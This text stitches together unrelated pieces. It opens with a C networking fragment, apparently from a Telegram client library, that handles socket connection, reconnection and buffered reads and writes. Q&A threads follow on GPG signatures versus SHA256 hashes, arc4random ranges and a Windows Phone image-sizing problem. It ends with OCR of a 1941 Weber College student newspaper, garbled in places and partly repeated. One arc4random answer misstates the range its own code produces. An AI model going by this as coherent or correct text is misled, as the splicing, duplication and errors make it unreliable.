if (inet_pton (AF_INET6, host, &addr6.sin6_addr.s6_addr) != 1) { vlogprintf (E_ERROR, "Bad ipv6 %s\n", host); close (fd); return -1; } } else { addr.sin_family = AF_INET; addr.sin_port = htons (c->port); if (inet_pton (AF_INET, host, &addr.sin_addr.s_addr) != 1) { vlogprintf (E_ERROR, "Bad ipv4 %s\n", host); close (fd); return -1; } } fcntl (fd, F_SETFL, O_NONBLOCK); if (connect (fd, (struct sockaddr *) (v6 ? (void *)&addr6 : (void *)&addr), v6 ? sizeof (addr6) : sizeof (addr)) == -1) { if (errno != EINPROGRESS) { close (fd); return -1; } } return fd; } struct connection *tgln_create_connection (struct tgl_state *TLS, const char *host, int port, struct tgl_session *session, struct tgl_dc *dc, struct mtproto_methods *methods) { struct connection *c = talloc0 (sizeof (*c)); c->TLS = TLS; c->ip = tstrdup (host); c->port = port; int fd = my_connect (c, c->ip); if (fd < 0) { vlogprintf (E_ERROR, "Can not connect to %s:%d %s\n", host, port, strerror(errno)); tfree (c, sizeof (*c)); return 0; } c->fd = fd; c->state = conn_connecting; c->last_receive_time = tglt_get_double_time (); c->flags = 0; assert (!Connections[fd]); Connections[fd] = c; c->ping_ev = evtimer_new (TLS->ev_base, ping_alarm, c); c->fail_ev = evtimer_new (TLS->ev_base, fail_alarm, c); c->write_ev = event_new (TLS->ev_base, c->fd, EV_WRITE, conn_try_write, c); struct timeval tv = {5, 0}; c->read_ev = event_new (TLS->ev_base, c->fd, EV_READ | EV_PERSIST, conn_try_read, c); event_add (c->read_ev, &tv); start_ping_timer (c); c->dc = dc; c->session = session; c->methods = methods; char byte = 0xef; assert (tgln_write_out (c, &byte, 1) == 1); tgln_flush_out (c); return c; } static void restart_connection (struct connection *c) { struct tgl_state *TLS = c->TLS; if (c->last_connect_time == time (0)) { start_fail_timer (c); return; } /*if (strcmp (c->ip, c->dc->ip)) { tfree_str (c->ip); c->ip = tstrdup (c->dc->ip); }*/ c->last_connect_time = time (0); int fd = my_connect (c, c->ip); if (fd < 0) { vlogprintf (E_WARNING, "Can not connect to %s:%d %s\n", c->ip, c->port, strerror(errno)); start_fail_timer (c); return; } c->fd = fd; c->state = conn_connecting; c->last_receive_time = tglt_get_double_time (); start_ping_timer (c); Connections[fd] = c; c->write_ev = event_new (TLS->ev_base, c->fd, EV_WRITE, conn_try_write, c); struct timeval tv = {5, 0}; c->read_ev = event_new (TLS->ev_base, c->fd, EV_READ | EV_PERSIST, conn_try_read, c); event_add (c->read_ev, &tv); char byte = 0xef; assert (tgln_write_out (c, &byte, 1) == 1); tgln_flush_out (c); } static void fail_connection (struct connection *c) { struct tgl_state *TLS = c->TLS; if (c->state == conn_ready || c->state == conn_connecting) { stop_ping_timer (c); } event_free (c->write_ev); event_free (c->read_ev); rotate_port (c); struct connection_buffer *b = c->out_head; while (b) { struct connection_buffer *d = b; b = b->next; delete_connection_buffer (d); } b = c->in_head; while (b) { struct connection_buffer *d = b; b = b->next; delete_connection_buffer (d); } c->out_head = c->out_tail = c->in_head = c->in_tail = 0; c->state = conn_failed; c->out_bytes = c->in_bytes = 0; close (c->fd); Connections[c->fd] = 0; vlogprintf (E_NOTICE, "Lost connection to server... %s:%d\n", c->ip, c->port); restart_connection (c); } //extern FILE *log_net_f; static void try_write (struct connection *c) { struct tgl_state *TLS = c->TLS; vlogprintf (E_DEBUG, "try write: fd = %d\n", c->fd); int x = 0; while (c->out_head) { int r = write (c->fd, c->out_head->rptr, c->out_head->wptr - c->out_head->rptr); if (r >= 0) { x += r; c->out_head->rptr += r; if (c->out_head->rptr != c->out_head->wptr) { break; } struct connection_buffer *b = c->out_head; c->out_head = b->next; if (!c->out_head) { c->out_tail = 0; } delete_connection_buffer (b); } else { if (errno != EAGAIN && errno != EWOULDBLOCK) { vlogprintf (E_NOTICE, "fail_connection: write_error %s\n", strerror(errno)); fail_connection (c); return; } else { break; } } } vlogprintf (E_DEBUG, "Sent %d bytes to %d\n", x, c->fd); c->out_bytes -= x; } static void try_rpc_read (struct connection *c) { assert (c->in_head); struct tgl_state *TLS = c->TLS; while (1) { if (c->in_bytes < 1) { return; } unsigned len = 0; unsigned t = 0; assert (tgln_read_in_lookup (c, &len, 1) == 1); if (len >= 1 && len <= 0x7e) { if (c->in_bytes < (int)(1 + 4 * len)) { return; } } else { if (c->in_bytes < 4) { return; } assert (tgln_read_in_lookup (c, &len, 4) == 4); len = (len >> 8); if (c->in_bytes < (int)(4 + 4 * len)) { return; } len = 0x7f; } if (len >= 1 && len <= 0x7e) { assert (tgln_read_in (c, &t, 1) == 1); assert (t == len); assert (len >= 1); } else { assert (len == 0x7f); assert (tgln_read_in (c, &len, 4) == 4); len = (len >> 8); assert (len >= 1); } len *= 4; int op; assert (tgln_read_in_lookup (c, &op, 4) == 4); if (c->methods->execute (TLS, c, op, len) < 0) { return; } } } static void try_read (struct connection *c) { struct tgl_state *TLS = c->TLS; vlogprintf (E_DEBUG, "try read: fd = %d\n", c->fd); if (!c->in_tail) { c->in_head = c->in_tail = new_connection_buffer (1 << 20); } #ifdef EVENT_V1 struct timeval tv = {5, 0}; event_add (c->read_ev, &tv); #endif int x = 0; while (1) { int r = read (c->fd, c->in_tail->wptr, c->in_tail->end - c->in_tail->wptr); if (r > 0) { c->last_receive_time = tglt_get_double_time (); stop_ping_timer (c); start_ping_timer (c); } if (r >= 0) { c->in_tail->wptr += r; x += r; if (c->in_tail->wptr != c->in_tail->end) { break; } struct connection_buffer *b = new_connection_buffer (1 << 20); c->in_tail->next = b; c->in_tail = b; } else { if (errno != EAGAIN && errno != EWOULDBLOCK) { vlogprintf (E_NOTICE, "fail_connection: read_error %s\n", strerror(errno)); fail_connection (c); return; } else { break; } } } vlogprintf (E_DEBUG, "Received %d bytes from %d\n", x, c->fd); c->in_bytes += x; if (x) { try_rpc_read (c); } } static void incr_out_packet_num (struct connection *c) { c->out_packet_num ++; } static struct tgl_dc *get_dc (struct connection *c) { return c->dc; } static struct tgl_session *get_session (struct connection *c) { return c->session; } static void tgln_free (struct connection *c) { if (c->ip) { tfree_str (c->ip); } if (c->ping_ev) { event_free (c->ping_ev); } if (c->fail_ev) { event_free (c->fail_ev); } if (c->read_ev) { event_free (c->read_ev); } if (c->write_ev) { event_free (c->write_ev); } struct connection_buffer *b = c->out_head; while (b) { struct connection_buffer *d = b; b = b->next; delete_connection_buffer (d); } b = c->in_head; while (b) { struct connection_buffer *d = b; b = b->next; delete_connection_buffer (d); } if (c->fd >= 0) { Connections[c->fd] = 0; close (c->fd); } tfree (c, sizeof (*c)); } struct tgl_net_methods tgl_conn_methods = { .write_out = tgln_write_out, .read_in = tgln_read_in, .read_in_lookup = tgln_read_in_lookup, .flush_out = tgln_flush_out, .incr_out_packet_num = incr_out_packet_num, .get_dc = get_dc, .get_session = get_session, .create_connection = tgln_create_connection, .free = tgln_free };
Q: Why we use GPG signatures for file verification instead of hash values? for example here they put a gpg signature to verify what you download is what they really made. but why they just don't put a SHA256 hash value ? because its much more faster to check it and sometimes gpg may not be installed on our machine but SHA is something everywhere available also you even can upload the file on virustotal.com and it give you the hash ! if hash is secure why they use gpg if is not secure why we use hash values for everything ? A: When you check the hash value, you have to check it against a reference hash value: this does not solve the problem, just moves it around. You still have to make sure that you got the correct hash value. If the hash value is obtained through the same channel as the software package (i.e. you both got them from a HTTPS Web page), then you have gained nothing against attackers: if the attacker could alter the package, then he could also recompute the hash and alter the hash value you obtain so that you would not see any problem. Typically, someone who hijacks the download server itself. Hash values "alone" are good at detecting random transmission errors (e.g. a router with bad RAM), not intentional alterations. Digital signatures offer an enhanced service: they link the package to the individual who produced it, regardless of intermediate servers. With a GPG signature, you can download the package from a shady mirror site and still do not have to fear the package being bugged. As for performance, know that signature verification will have the same cost as computing a hash, plus an extra mathematical operation which even an asthmatic PC should be able to do within a few milliseconds. I seriously doubt you could actually observe that extra cost.
Q: How to select range of values when using arc4random() Can I set a range of numbers when using arc4random()? For example 50-100 only. A: As pointed out in other posts below, it is better to use arc4random_uniform. (When this answer was originally written, arc4random_uniform was not available). Besides avoiding the modulo bias of arc4random() % x, it also avoids a seeding problem with arc4random when used recursively in short timeframes. arc4random_uniform(4) will generate 0, 1, 2 or 3. Thus you could use: arc4random_uniform(51) and merely add 50 to the result to get a range between 50 & 100 (inclusive). A: To expand upon JohnK comment. It is suggested that you use the following function to return a ranged random number: arc4random_uniform(51) which will return a random number in the range 0 to 50. Then you can add your lower bounds to this like: arc4random_uniform(51) + 50 which will return a random number in the range 50 to 100. The reason we use arc4random_uniform(51) over arc4random() % 51 is to avoid the modulo bias. This is highlighted in the man page as follows: arc4random_uniform(upper_bound) will return a uniformly distributed random number less than upper_bound. arc4random_uniform() is recommended over constructions like ``arc4random() % upper_bound'' as it avoids "modulo bias" when the upper bound is not a power of two. In short you get a more evenly distributed random number generated. A: int fromNumber = 10; int toNumber = 30; int randomNumber = (arc4random()%(toNumber-fromNumber))+fromNumber; Will generate randon number between 10 and 30, i.e. 11,12,13,14......29
Q: Why image don't autosize in grid panel? I tried to make a wp7 app with expression blend. But is there a problem that make me crazy! I created a Panorama Controller, a Panorama Item and a Grid. In this grid i create an Image. Why my image won't enlarge on width? Here the screenshots: The gray image is rounded also at dx, like sx side. Here the config: Is there a solution to enlarge my image on width like max size of grid? How can I do this? This is my snippet of code: <controls:PanoramaItem Foreground="Black" > <Grid Margin="1,26,160,46" Width="418"> [...] <Grid Margin="0,190,8,0" VerticalAlignment="Top" Height="207" > <Image Source="JobRow.png" Margin="8,34,27,50" Stretch="None" /> </Grid> </Grid> </controls:PanoramaItem> Any idea please? EDIT 1: if I change Stretch this is the result, my image enlarge only in height! It's like that is blocked at certain position... but i don't know why!!! EDIT 2: Changing default orientation will not enlarge my grid! <controls:PanoramaItem Foreground="Black" Width="438" Orientation="Horizontal"> A: Ok, solved removing all Width="xxx" from XAML file and after, from Expression Blend, manually resizing all the components. I don't know why, but it works! thanks all
To link to the entire object, paste this link in email, IM or documentTo embed the entire object, paste this HTML in websiteTo link to this page, paste this link in email, IM or documentTo embed this page, paste this HTML in website ft 562 P. L. & R. W & Attend Me A. A U. Meet Today! Have You Seen Weber Swim? NO. 10 VOLUME 4 OSDEN, UTAH, THURSDAY, FEBRUARY 13, 1941 G N " High School Debate Meet Set February 28 ,March 1 Large Enrollment Again Expected Here On February 28 and March i, Weber college will hold its eighth annual high school debating and speech tournament. This tournament is sponsored and conducted by the Weber College Department of English comprising, Leland H. Monson, head of the department; Marian T. Reed, Cluster N. Nilsson, David R. Trevithick, and Charles Espy, members of the department. Mr. Nilsson will be in charge of the entire men's division. The men's "A" division will be under the direction of Mr. Trevithick. Mr. Espy will supervise the men's "B" division and will have charge of selecting the judges. Mr. Monson will be assisted by Miss Reed in supervising the tournament as a whole. Thatcher Allred will conduct the work of extemporaneous and oratorical speaking. The Utah high schools that have already registered for the ourna-ment include Pleasant Grove, Provo, Lincoln, American Fork, West, Weber County, East, Delta, Ogden, South, Davis, Springville, B. T. U., Carbon County, Box Elder, Lehi, and Bear River. Last year, there were over 428 enrollments in the tournament from the various high schools in the state. This year, there is expected to be an equally large enrollment. Divisions In the debating section of the tournament, there will be a men's and women's division. Those teams the men's division. The men's di that are mixed will debate in the men's division. The men's division will consist of group "A" and "B." Group "A" will be judged by trained individuals, while group "B" will be judged by the students who participate in the debating in the "B" division. The question that will be debated upon is resolved: That the powers of the federal government should be expanded. Ten minutes will be allowed for the constructive speeches and five minutes for rebuttal speeches. Four rounds of debate will be conducted before any eliminations are made. Two defeats are necessary for eliminationg. Speakers Subjects for extemporaneous speaking will be taken from selected topics of the January and February issues of Time and News Week. The speeches will be limited to seven minutes, but they must not be less than five minutes. Any school may have as many entries in this division as it desires. Contestants in the oratorical di-(Continued on Page 1) Want to Charm? Coed Tells INew Techniques BY ABLENE ANDREW Have you heard about whodoyou-callhim and whatchamaycallher? Well, I was told by someone who found out from somebody who was told by a fellow in whosit's eight o'clock class that they were And so it goes. Do you use this expert method of making enemies and losing influence? Do you gossip? Hmm, as a gal with a P. S. degree (Professor of Sichcology,) I would diagnose your case as one of repressed desires, too much leisure time, and maybe even a little jealousy. (Mmmmm, me too.) Why don't you learn how to doodle or play the Jews harp or wooooooo Pumpkins Corners' style in 21 easy lessons? If you are the gossiping kind, it would give you another way to gain attention; and, when you open your mouth, people within a five-mile radius won't tremble and shiver in fear of what will come out. And if you aren't the gossiping kind, well, playing the Jews harp is lots of fun . . . There are some things like gossiping that decrease that certain thing called charm, appeal, good manners, personality whatever name you know it by. We all know about them, but sometimes we forget.F'rinsta-nce For instance, there is unfounded criticism, which is a first cousin Sophie to gossip. If someone is giving a lecture on "The Art of Catching Guppics," who are you to say that he's feeding you a line? After all, you're no guppy! Do you help yourself to things that don't belong to you? Perhaps unconsciously, perhaps not? Didn't you realize that they put people in jail for oh, oh. Where did this pencil I'm writing with come from? I've never seen it before. Hmm, it says U. S- government, dept. of justice . . . oh, oh. Woops, now I've got you. Do you laugh at the mistakes of others? That's an unpardonable action. Oh, you didn't laugh? gulp! I guess I'll have to try again. Who is this guy Jack Benny, anyhow? Another little thing that sorta makes guys 'n gals not so very super-special is telling shady jokes. Uh hunh, that's the kind I mean. (Continued on Page 4; Committee Tells Of Changes In Award System Amendments made to the award system, as given by Mr. Buss, chairman of award committee, and passed by the board of control. They are as follows: 1. That presidents of social clubs be given the same number of award points as those professional clubs, namely: 0-1 points per year. In case the officers change more frequently than once per year, 0-1 points will be given if the participation has been at least two quarters. 2. That the president of the inter-club council be awarded from 0-1 points per year. The club sponsor shall recommend the candidates to the awards committee. 3. That members of the Letter-men's club be allowed to purchase purple sweaters with a white block "W" at the close of the activity in which an award is earned. The director of the activity will recommend the candidates and after approval by the awards and scholarships committee the faculty sponsor of the Lettermen will supervise the choice of style arid purchase of the sweaters. The members of the club shall consist of those students who have earned two or more award points in athletics and have been passed on according to the rules of the award system. Ie defining close of activity, it is to be understood that the candidate shall have attended two quarters or at least one and be registered for the second in the year in which the two points in question were earned. 4. That the participant for an award shall be limited to two simultaneous activities and 11 activity points per year. The com bined awards committee and the board of control shall have the power to modify the above in exceptional cases. 5. That a person shall not be eligible for Orion on scholastics alone. Student chairman for this committee is Arlene Jensen. Kent Baggs, Earl Tanner, Loyal Chris-tenson, Carolyn Smith make up the rest of the group. Music Festival Plans Made Plans for housing and entertaining an expected 5000 junior and senior high school music students who will come to Ogden May 8, 9, and 10 for the regional music festival, have been formulated by committees appointed by Clair W. Johnson of Weber music department and general chairman of the festival. Earl W. Folkman has been named chairman of the housing committee, Mr. Johnson reported, and will immediately choose other members of his committee in order to prepare to take care of every student and faculty member who attends the festival. Present plans include a canvass of every home in Ogden to find plays for these music students in private homes during the three-day contest. Facilities of Weber college and Ogden senior high school will be made available for most of the contests, with a big downtown parade of bands and other participants scheduled for Saturday, May 10, the final day of the festival. Immediately following the parade, the bands will move to Ogderi municipal stadium, where each of the contestants placing first, second or third in each event, will be given certificates of award for their participation. The big event, however, will be the massed formations and band numbers at the stadium, which, it is believed, will draw a numerous group of spectators to see the grand finale of the three-day festival. The anticipated students who will come to Weber in May will come from Wyoming, Colorado, Utah, Idaho, and Nevada, and only those students who have placed in district festivals with a rating "superlative" will be heard in the festival contests in Ogden. Other committee heads named by Mr. Johnson include A. L. Levin, finance; Police Lieutenant Darrei E. Shaw, traffic; William P. Miller, superintendent of Weber county schools, entertainment; with Louis A. Gladwell as chairman and M. J. Bunnell and T. R. Johnson as members of the publicity committee. Winter Scribulus Publication Set Winter publication of the school magazine, "Scribulus," will be out in about two weeks, reports Mr. Reed Coray, editor. The issue will be of interest to every student at Weber. Scribulus will feature each department with demonstrations and exhibits. This feature will present exhibits of the business correspondent students. Some of the outstanding features in the publication this quarter will be a poem, "Illiandia," by Dan Bailey, and "Drum to No Pacing," by Wayne Bundy. The COVer will he dnne Kv fr Farrell Collett. Charmers Complete Domesticity has invaded the student body office as A. W. S. officers act as student body officers for Charm week. Above, Max Orton receives his "draft notice" for the Conscription ball from President Rosella Larkin, while Secretary Marian Fiet and Vive President Louise Dixon "charmify" their surroundings with a broom and watering can, respectively. Women Take Over' Offices, Set Lectures, Assemblies, and Ball for Charm Week Fashion reviews, talks on charm, special assemblies, dramatic produc tions, radio broadcasts, and a big conscription ball all are included in the activities of Charm week. Charm week, which is an annual affair, is to be sponsored next week here at Weber by the Associated Women students. The A. W. S. officers with the organization's advisor, Mrs. Clarisse Hall, are in charge of activities. Weber for the first time will be governed by women. Student President Mark Austad will abdicate to Rosella Larkin; as likewise Emma Martin, to Louise Dixon, and Ethel Hogge, to Marian Fiet during Charm week. In a special girls' assembly Tuesday a play entitled "All This and Allen Too," Is to be presented by Virginia Allen and Dorothy Lichfield. This play Is written by Joan Allred, and it is the story of a group of college girls preparing for a dance. Characters The characters are portrayed by Beverly Jurgens, Neta Chard, Lucille Burbidge, Mary Lou Foutz, and Helen Thorpe. Wednesday in the women's lounge at three, Mrs. Beth Summerhays of Z. C. M. I. will give a lecture and fashion show. Thursday at seven-thirty Dean Myrtle Austin of the University of Utah will lecture to the girls. The week will be climaxed Friday by a big conscription ball which is to be held in the college ballroom.Chairman General chairman of the dance is Marian Fiet with the following committees acting under her: Signpost publicity, Ardell Russell and Marjorie Vowles; advertising, Elizabeth Blair, Ruth Carver, and Ber-nice Perrin; invitations, LaRene Thompson; decorations, Mildred Taggart; tickets, Clare Gilman, and programs, Helen Fuller. Chairman of the assembly is Louise Dixon, and the lectures are under the direction of Dorothy Meyer, Winona Webester, and ElsieMcKay. Weber Freshman Plays Role BY GERALD WRIGHT Darrell Brown, freshman business student at Weber college, today described a most harrowing experience to student acquaintances, as the result of a hold-up-murder in which he participated as one of the victims. A part-time employe of Safeway Grocery Store No. 4 of Ogden, Brown was working at his job of cashier Tuesday evening at the time of the holdup, which resulted in the death of Detective Hoyt Gates. The whole ghastly affair, Brown indicated, showed that the bandit was an experienced, merciless criminal and not the weeping novice published reports have characterized him as. Brown's own account follows: Closing Time "It was six-thirty, closing time. The employes of the store were cleaning up, preparing to leave. As it was my duty to lock the door, I had taken the keys from the manager and walked toward the front of the store. Before I could reach the door it opened, admitting a six-foot man of medium build wearing a dark overcoat. His right hand was held up inside the coat in a curious fashion. Otherwise he was just a late customer. "Instead of passing, he bumped into me and something was jammed in my ribs hard. Go back to the till,' he said and poked me with his gun. Call the other fellows. I called but they thought I was just joking. 'Get them over here Charm Plans... personality and marjorie Lecturer . . Mrs. Beth Summerhays Charm Lectures Feature S. L. Women Mrs. Beth Summerhays, fashion co-ordinator and fashion show director of Z. C. M. I., will he at Weber Wednesday afternoon. Mrs. Summerhays will bring with her two models who will demonstrate college fashions. She graduated from the University of Utah with a major in home (Continued on Page 2) or I'll let you have it,' he swore at me. Goddamming and sonsa bitching me. I yelled again and swore too but was almost paralyzed. Whew! "The manager was talking on the telephone to a woman. He was so he could say, 'Call the police' to her but nothing more. He didn't know himself what was up but one of the clerks told him to say it. Then he hung up. Late Customer "We were all gathered by the check stand. The fellow said, 'Okay, now give me the money.' Just as I reached for the register, in walked a late customer and his wife. The bandit scattered us but the customer said, 'What's come over you guys, takin' it easy for a change?' Then he and the hold-up both went to filling baskets, but the gunman kept us covered inside his coat. "When Detective Gates stepped inside, 10 minutes after the call, somehow the fellow spotted him for a policeman and let him have it. Three times in all, at about 20 feet. He hit Gates every time but Gates' bullets went into the ceiling. After the detective crawled outside, the fellow tried for a getaway but Gates shot again. Somehow the fellow thought the place was surrounded and only tried to get the manager to come to him for a shield. But the manager got shot at a few times by the bandit and kept away. By this time all the clerks and the customer's wife were hid out in the meat department. K3ra3K&.. vowles All week long the fellows of Weber college have been anxiously watching lists on the bulletin board to see if they can possibly go to the registrar's office. Why? To get their grades? To see if they are still students in good standing? No! To see if by any chance they have been drafted for Friday night, February 21. The girls at Weber have chosen to show their patriotism by giving a conscription dance, using a patriotic theme, and drafting their partners.Each girl placed her preference in a gold fish bowl. The fellow who received the most invitations will be presented at intermission and crowned king. (Maybe in this case he ought to be the general.) The invitations are being given out this week by Mrs. Clarisse Hall, advisor of A. W. S., who is also the registrar. Tickets will be on sale next Monday in the women's lounge for 50 cents. The music for the dance is to be furnished by the Hi-Hatters. At intermission a floor show will be presented under the direction of Lorraine Ritchie. The ballroom will be decorated in red, white, and blue. "If you fellows haven't yet received an invitation, have hope because some of the girls are slow in turning in their preferences. And girls turn in your preferences at once, before the men around Weber all go gray," says President Larkin. Injured Students Return To Classwork Here Foss Robinson and Clair Aldous are now back at school again after being absent for several days due to injuries sustained in an automobile crash. While driving home from Salt Lake City during a snow storm an approaching car skidded into the right hand lane in which Clair Aldous was driving. Due to the wet and slippery highway, neither car was able to stop and the cars collided. In Holdup-Murder DARK EL BROWN The customer was hid out in the back of the store, but the people in the street could see him and tried to get the police to do something about him; they thought he was the robber. Tear Gas "By this time the police had edged into the store and were trying to get at the fellow. He was at the rear of the store watching the door to the back room and the front entrance both, but the State Legislative Group Slates Biennial Junket to Weber College Weber College Roll Shows Heavy Increase Weber college, with an enrollment of 1224 resident full-time students for the 1940-41 academic year, contributed to a 20 per cent increase in the enrollment of 610 American junior colleges during the past year, figures released Friday in the 1941 directory of American Association of Junior Colleges reveal. Utah's six junior colleges have a total enrollment of 3299. This figure is exceeded in the 11 western states only by California, which has 64 junior colleges and 86,357 students. Idaho is third in the western group with four junior colleges and 2110 students, the directory shows. Statistics issued last fall by Dr. Walter C. Eells, executive secretary of American Association of Junior Colleges during an Ogden visit, show that California, Utah, and Idaho also lead the nation in per capita junior college enrollment. California has 119 junior college students per 10,000 population; Utah, 39; and Idaho, 38. The national average is 15, Dr. Eells pointed out. Weber college's enrollment jumped from 875 at the close of the 1938-39 year to 1121 at the close of 1939-40. Thus far in 1940-41, with the school year only half completed, the figure has reached 1224, college officials said. Substitute Lyceum Comes Feb. 24 Dr. A. M. Harding of the University of Arkansas will present a Sky Tour here on Monday, February 24 at eleven o'clock in the Moench auditorium. Dr. Harding is replacing Max Gene Noal, deep sea diver. Dr. Harding, professor of mathematics and astronomy, has devoted more than 30 years to the study of science, part of which time was spent at the University of Chicago, where he was awarded a doctor's degree in mathematics and astronomy.Although he has written several scientific textbooks his illustrated address are simple, non-technical, full of life and detail. They are intended for those who have not made a special study of science. Dr. Harding will present his program at the University of Utah the same day as he will be here. He will journey to the U. S. A. C. after he is here. Four Weberites Receive Cadet Appointments As a result of difficult physical and mental examinations, three Weber college students, and one alumnus received their letters of acceptance to the U. S. flying cadet service recently. The recipients are: Blaine Felt, Alan Christenson, Wendall Sepich, and Sam Anderson.They will be called to service just as soon as classes can be arranged to accomodate them. They will probably receive the appointments within the next few weeks. police got in and kept crawling toward him. Finally a tear gas bomb thrown into the back room bothered him and the police put their guns on him and he threw his gun away and put up his hands. "But he wasn't the sissy the reports made him out to be. If he seemed to be shedding tears, it was just the gas. He was a real gang-buster bad man in our store for about 35 minutes. And we knew we were in danger of getting shot all the time he was there, though we didn't know Detective Gates had been hit." Brown still showed signs of the ordeal when he gave out these facts of his experience, some hours later. He said bullet holes showed that 17 shots had been fired. Faculty Seminar Panel Discusses Maw Bill Governor Herbert Maw's streamlined bill for governmental reorganization of Utah was discussed in panel by faculty members in their regular seminar Monday evening in the ladies' lounge. The seminar committee of the faculty had general charge. Mr. David Trevithick led the discussion and Mr. Walter Neville, Mr. Clyde Decker, Mr. Dix Jones, and Mr. C. H. Anderson spoke on phases of the bill. Trend of the discussion was chiefly favorable. Utah House Members and Senate Committee Plan Visit February 26 Entries Pour in for Second Annual Journalism Contest Second o fthe annual high school newspaper contests sponsored by Weber college journalism department is well under way with fifteen hig. schools alreadj entered in the contest. The contest is under the direction of C. M. Nilsson, advisor, J. M. Demos, Signpost editor and Marva Jensen, contest editor. "With final judging scheduled for April 1 we are receiving letters from high schools almost daily," states Marva Jensen, contest editor. All the high schools in Utah to which the contest is limited, have been contacted and although some of them have mimeographed newspapers and are not eligible for the contest the rest have shown eagerness to enter it. The high schools which have entered so far are "Searchlight," Bear River high school, "The Pro-vonian" Provo ligh school, "Red and Blue" Springville high school, "Davis Darts" Davis county high school, "Tiger Highlights" Ogden high school, "The Broadcaster" Jordan high school, "The Clarion" South Cache high school, "The Bee" Box Elder high school, "South Scribe" South high school, "Logan Grizzly" Logan high school,"Murray-Go-Round" Murray high school, "The Red and Black" East high school, "The Norcachian" North Cache high school, "Red and Gray Flashes" Spanish Fork high school, and "The Granitian" Granite high school. The school which is judged best on the merits of copy, appearance, etc., is awarded a cup, and all of the high schools entered in the contest will receive constructive criticism. The cup was won last year by the "South Scribe," newspaper published by South high chool, Salt Lake City. Business Club Presents Comic Play BY DEWEY HUDSON Business definitely took a turn for the better last Friday when the members of the business club presented an assembly for the student body in the Moench auditorium during the regular assembly period. Presenting a humorous skit depicting the ridiculous situation resulting from 110 people of directly opposite personalities being stuck in an elevator between floors in a metropolitan building, the cast had the audience literally rolling in the aisles from beginning to end. "The Lost Elevator," written by Percival Wilde, and directed by Miss Coleman of the business department was the title, and the cast was as follows: Don Peterson as the almost-engaged-man, Lois Peterson as thealmost-engagcd-young wjman, Grant Neuteboom as a book salesman, Charles Daniels as the colored elevator man, Rex McEntire as the big good-natured man, Winslow Cardner as the man who was in a hurry, Betty Blair as the nice old lady, Marion Ny-land as the romantic old maid, Ruth Compton as the German lady, Helen Thorpe as the woman with a tooth ache. Darold Burt, president of the Business club, gave a short review of the program, and introduced the rest of the officers: Marion Fiet, vice president; Foss Robinson, secretary, and Lewis Austad, manager. J. C. C. Oratorical Contest Slated February 21, a patriotic assembly will be held at Weber college under the auspices of the junior chamber of commerce- The program will consist of musical numbers and two speeches on patriotic subjects. The eight-minute speeches wiH be given by Weber college students. Students who would like to participate should contact Mr. Allred. Preliminaries for the speech contestants will be held Monday or Tuesday, and two finalists from this group will be presented in the assembly. The winner of the two finalists who give their speeches in the assembly will be awarded a medal. The winning member will also be honored by having his name engraved upon a gold cup which will be kept within the school. Assembly, Campus Tour Set For Reception Utah state legislators will be guests at Weber college, February 26. All members of the house of representatives and propably a committee from the senate will be here. Many of them will be accompanied by their wives. The trip will give the legis-ture a general impression of the whole school while it is in operation, familiarize them with the needs and progress of the school. An assembly will be held that day to welcome and meet the members. President H. A. Dixon and Mr. Whitney Young will be In charge of the assembly. President Dixon yesterday said: "Every student is urged to be present because the occasion is important." Members The members of the legislature will arrive by bus from Salt Lake City at nine o'clock. They will be met by the band and committeei in charge of the day at the gymnasium building. They will then separate into tours of inspection of the various buildings- An assembly is tentatively slated at eleven o'clock. The afternoon will be spent visiting other state institutions such as the Sanitorium, the State Industrial School, and the Deaf and Blind School. In the evening they will have dinner in the cafeteria under the supervision of Mrs. Lydia Tanner. The general committee who will be in charge of the events of that day, as far as Weber college is concerned, is composed of President Dixon, Mr. John Benson, Mr. C. H. Anderson, Mrs. Clarisse Hall, and Mr. Robert Clarke of the faculty. Committees These will be in charge of subcommittees: Robert Clarke, exhibits; John Benson, publicity; David R. Trevithick, tours; Mrs. Lydia Tanner, luncheon; Orlo Childs, luncheon program; Ralph Jenson, transportation; President Dixon, invitations; President Dixon and Whitney Young, assembly, and Mrs. Clarisse Hall, reception. A number of students will be appointed to serve on committees. A girls club will usher at the assembly and take charge of the coats and hats of legislators and their wives. Yehudi Menuhin Program Listed Monday, February 17 at eight-thirty p. m- Yehudi Menuhin will present one of the biggest community concerts of the season in the Ogden high school auditorium. Mr. Guy Hurst, Weber college director of the lyceum, today urged college students to be in their seats early. Mr. Menuhin will play the following program with Hendrik Endt at the piano: 1. 'Sonato in G Minor (The "Devil's Trill,") Tartini-Kreisler. 2. Sonata No. 1 in G Minor (for violin alone.) Bach. Adagio, Fuga (Allegro,) Siciliano, Presto. INTERMISSION 3. 'Concerto No. 1 in D Major, Opus 6, Paganini. (Urtext Edition to Commemorate the Centenary of Paganini) Allegro Maestoso (Cadenza by Emile Sauret.) 4. A. Negro Spiritual Melody, Dvorak-Kreisler, (from the Largo of "The New World Symphony." B 'Caprice Basque, Sarasate. C. 'Caprice Vien-nois, Kreisler. D. 'La Fille aux cheveux de Iin, Debussy-Hartmann. (The maiden with the flaxen hair.) E. La Ronda des Iutins (The dance of the goblins,) Bazzini. Each one of the compositions on this program has been recorded by Mr. Menuhin for the Gramophone Company of England and in America, on Victor Red Seal records. For his concerts Mr. Menuhin will play two of the finest instruments in the world, the famed "Princess Khevenhueller" Stradivarius. made in 1733 and played by only four violinists since, and a 1742 Guar-anerius, the recent gift of hie wife. Public Domain. Courtesy of University Archives, Stewart Library, Weber State University. Full-Text ft 562 P. L. & R. W & Attend Me A. A U. Meet Today! Have You Seen Weber Swim? NO. 10 VOLUME 4 OSDEN, UTAH, THURSDAY, FEBRUARY 13, 1941 G N " High School Debate Meet Set February 28 ,March 1 Large Enrollment Again Expected Here On February 28 and March i, Weber college will hold its eighth annual high school debating and speech tournament. This tournament is sponsored and conducted by the Weber College Department of English comprising, Leland H. Monson, head of the department; Marian T. Reed, Cluster N. Nilsson, David R. Trevithick, and Charles Espy, members of the department. Mr. Nilsson will be in charge of the entire men's division. The men's "A" division will be under the direction of Mr. Trevithick. Mr. Espy will supervise the men's "B" division and will have charge of selecting the judges. Mr. Monson will be assisted by Miss Reed in supervising the tournament as a whole. Thatcher Allred will conduct the work of extemporaneous and oratorical speaking. The Utah high schools that have already registered for the ourna-ment include Pleasant Grove, Provo, Lincoln, American Fork, West, Weber County, East, Delta, Ogden, South, Davis, Springville, B. T. U., Carbon County, Box Elder, Lehi, and Bear River. Last year, there were over 428 enrollments in the tournament from the various high schools in the state. This year, there is expected to be an equally large enrollment. Divisions In the debating section of the tournament, there will be a men's and women's division. Those teams the men's division. The men's di that are mixed will debate in the men's division. The men's division will consist of group "A" and "B." 